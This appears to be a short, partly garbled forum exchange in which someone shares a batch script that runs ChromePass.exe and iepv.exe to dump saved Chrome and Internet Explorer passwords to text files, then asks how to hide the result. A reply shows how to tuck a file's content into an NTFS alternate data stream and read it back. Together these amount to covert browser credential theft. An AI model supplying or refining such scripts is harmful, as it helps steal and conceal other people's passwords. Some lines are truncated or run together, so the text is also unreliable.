Does anyone know how I can use the batch code to hide a file? This is my code:
@echo off
start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext iepv.tx
Here's another way using stream:
Hide.bat
@echo off
more < file.txt > fileB.txt:stream1
pause
file.txt
and echo the content into fileB.txt
's stream1Read.bat
@echo off
more < fileB.txt:stream1
pause
fileB.txt
's content from stream1See: https://ss64.com/nt/echo.html